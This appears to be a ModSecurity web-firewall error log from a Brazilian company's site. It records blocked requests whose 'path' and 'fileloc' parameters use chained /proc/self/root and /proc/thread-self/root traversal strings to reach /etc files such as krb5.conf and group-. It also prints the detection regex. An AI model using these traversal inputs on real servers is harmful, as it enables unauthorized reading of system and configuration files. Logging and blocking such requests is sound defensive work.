[Wed Mar 18 04:57:42.085425 2026] [:error] [pid 15826:tid 140411691570944] [client 74.7.241.31:52950] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpa9uoXxyEfFpUF8f800QAAAUY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:58:07.560961 2026] [:error] [pid 29882:tid 140411557287680] [client 74.7.241.31:46700] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbD0zinOy1jxa1j4fa9gAAARY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:58:10.890350 2026] [:error] [pid 31803:tid 140411582465792] [client 74.7.241.31:54352] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbEuyqAr6etmhZHNqCCgAAAFM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 04:58:47.262195 2026] [:error] [pid 11816:tid 140411666392832] [client 74.7.241.31:54362] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbN-w_le52K8_3pV2otgAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:58:48.817429 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.241.31:48232] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbOOw_le52K8_3pV2ouAAAAgU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:00:14.877212 2026] [:error] [pid 19507:tid 140411658000128] [client 216.73.216.191:38791] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //run/initramfs/state/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbjtY0UrI5A3LftIxdnQAAAYo"]
[Wed Mar 18 05:00:15.550798 2026] [:error] [pid 29882:tid 140411683178240] [client 216.73.216.191:44469] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbj0zinOy1jxa1j4fbCwAAAQc"]
[Wed Mar 18 05:00:16.401476 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.241.31:48244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbkOw_le52K8_3pV2pBgAAAhQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:00:17.764533 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:53916] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpbkfu8EFLIOrSqIpvOUQAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:00:22.362362 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.241.31:53928] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpblta6ubjKNq_cu4ZeTgAAA0Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:01:28.406041 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.241.31:53942] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpb2NY0UrI5A3LftIxd6gAAAYQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:01:40.890595 2026] [:error] [pid 19507:tid 140411548894976] [client 74.7.241.31:52686] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpb5NY0UrI5A3LftIxd-gAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:01:54.118629 2026] [:error] [pid 19507:tid 140411574073088] [client 74.7.241.31:54846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpb8tY0UrI5A3LftIxeEwAAAZQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:02:02.198275 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:40726] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpb-ta6ubjKNq_cu4ZebQAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 05:02:17.182659 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.228.61:44910] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpcCeoXxyEfFpUF8f81CgAAAUk"]
[Wed Mar 18 05:02:18.581364 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.244.43:38640] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abpcCuw_le52K8_3pV2pHgAAAhA"]
[Wed Mar 18 05:03:34.492824 2026] [:error] [pid 29882:tid 140411574073088] [client 74.7.241.31:58776] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpcVkzinOy1jxa1j4fbkwAAARQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 05:03:40.612101 2026] [:error] [pid 15826:tid 140411699963648] [client 216.73.216.191:53591] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/group-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpcXOoXxyEfFpUF8f81JAAAAUU"]
[Wed Mar 18 05:04:46.149845 2026] [:error] [pid 15051:tid 140411599251200] [client 74.7.241.31:43828] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpcnimAPhZkrhU8w4k2WAAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:05:10.402433 2026] [:error] [pid 26799:tid 140411733534464] [client 74.7.241.31:58096] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpctta6ubjKNq_cu4Ze1gAAA0E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 05:05:11.253010 2026] [:error] [pid 29882:tid 140411691570944] [client 216.73.216.191:42163] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/krb5.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpct0zinOy1jxa1j4fbwgAAAQY"]
[Wed Mar 18 05:05:11.863436 2026] [:error] [pid 30077:tid 140411699963648] [client 216.73.216.191:12220] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/mke2fs.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpct_u8EFLIOrSqIpvPAAAAAkU"]
[Wed Mar 18 05:05:28.081234 2026] [:error] [pid 15051:tid 140411658000128] [client 74.7.243.128:50692] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpcyCmAPhZkrhU8w4k2iAAAAIo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 05:06:28.473285 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.241.31:34234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpdBAkwaGbbGflqUZDaeAAAANM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
